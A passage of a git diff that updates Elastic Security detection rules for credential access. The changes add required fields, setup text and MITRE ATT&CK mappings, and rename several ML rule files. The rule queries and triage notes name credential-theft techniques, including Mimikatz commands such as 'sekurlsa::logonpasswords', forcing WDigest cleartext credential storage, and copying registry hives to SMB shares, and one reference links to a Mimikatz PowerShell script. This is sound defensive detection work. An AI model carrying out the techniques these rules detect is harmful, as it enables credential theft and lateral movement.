56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Mimikatz Memssp Log File Detected - ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6\n- Modification of WDigest Security Provider - d703a5af-d5b0-43bd-8ddb-7a5d500b7da5\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Validate that cleartext passwords are disabled in memory for use with `WDigest`.\n- Look into preventing access to `LSASS` using capabilities such as LSA protection or antivirus/EDR tools that provide\nthis capability.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "note": "## Triage and analysis\n\n### Investigating Mimikatz PowerShell Activity\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to move laterally and pivot across a network.\n\nThis rule looks for PowerShell scripts that load mimikatz in memory, like Invoke-Mimikataz, which are used to dump\ncredentials from the Local Security Authority Subsystem Service (LSASS). Any activity triggered from this rule should be\ntreated with high priority as it typically represents an active adversary.\n\nMore information about Mimikatz components and how to detect/prevent them can be found on [ADSecurity](https://adsecurity.org/?page_id=1821).\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Invoke-Mimitakz and alike scripts heavily use other capabilities covered by other detections described in the\n \"Related Rules\" section.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the\ntarget host.\n - Examine network and security events in the environment to identify potential lateral movement using compromised credentials.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Mimikatz Memssp Log File Detected - ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6\n- Modification of WDigest Security Provider - d703a5af-d5b0-43bd-8ddb-7a5d500b7da5\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Validate that cleartext passwords are disabled in memory for use with `WDigest`.\n- Look into preventing access to `LSASS` using capabilities such as LSA protection or antivirus/EDR tools that provide\nthis capability.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.category:process and\npowershell.file.script_block_text:(\n (DumpCreds and\n DumpCerts) or\n \"sekurlsa::logonpasswords\" or\n (\"crypto::certificates\" and\n \"CERT_SYSTEM_STORE_LOCAL_MACHINE\")\n)\n", "references": [ "https://attack.mitre.org/software/S0002/", "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json index 9c0f2d0c07dc9..7aec30a007bde 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json @@ -19,6 +19,33 @@ "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "10a500bb-a28f-418e-ba29-ca4c8d1a9f2f", "severity": "medium", @@ -48,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_failed_logon_events.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_failed_logon_events.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_failed_logon_events.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_failed_logon_events.json index 88644687c0419..0df83164ccc81 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_failed_logon_events.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_failed_logon_events.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events.json similarity index 67% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events.json index d591cc6e0f56d..073f679c8c31a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events_from_a_source_ip.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json similarity index 69% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events_from_a_source_ip.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json index ee9acc43ac8d7..4ac33f3b579b3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events_from_a_source_ip.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_process.json similarity index 55% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_process.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_process.json index c0bcf411363dd..4008fe3dfbf50 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_process.json @@ -22,8 +22,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_user.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_user.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_user.json index b1761e9c95d23..e8f30690dc898 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_user.json @@ -22,8 +22,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_suspicious_login_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_suspicious_login_activity.json similarity index 65% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_suspicious_login_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_suspicious_login_activity.json index 1c3902fc94c0b..6aaafdab1f81c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_suspicious_login_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_suspicious_login_activity.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_process.json similarity index 55% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_process.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_process.json index d0eb0d70841df..5e3474a5b4b26 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_process.json @@ -22,8 +22,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_user.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_user.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_user.json index 343719523210f..fb34ca2f29016 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_user.json @@ -22,8 +22,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json index 6e0dd264229d7..457ad2b940cfc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json @@ -12,15 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Modification of WDigest Security Provider", - "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send\ncleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications\nbased on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default,\nwhich is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the\n`HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is\ncommonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should\ntreat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target\nhost after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the entire domain to credential compromises and\nconsequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where event.type : (\"creation\", \"change\") and\n registry.path : \n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n and registry.data.strings : (\"1\", \"0x00000001\")\n", + "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send\ncleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications\nbased on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default,\nwhich is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the\n`HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is\ncommonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should\ntreat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target\nhost after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the entire domain to credential compromises and\nconsequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where event.type : (\"creation\", \"change\") and\n registry.path :\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n and registry.data.strings : (\"1\", \"0x00000001\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and user.id : \"S-1-5-18\")\n", "references": [ "https://www.csoonline.com/article/3438824/how-to-detect-and-halt-credential-theft-via-windows-wdigest.html", "https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft?edition=2019", "https://frsecure.com/compromised-credentials-response-playbook" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -55,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json index f75b18ce71268..be78a1108773e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json @@ -12,6 +12,33 @@ "name": "Windows Registry File Creation in SMB Share", "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the\ncase for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain\ncached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to\ndecrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not\nmonitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive\nfile on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of\nactivity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "file where event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : \"s-1-5-21*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494", "severity": "medium", @@ -71,5 +98,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json index f5449e4e30a1c..db5fac7d13473 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json @@ -13,14 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Okta Brute Force or Password Spraying Attack", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.category:authentication and event.outcome:failure\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": 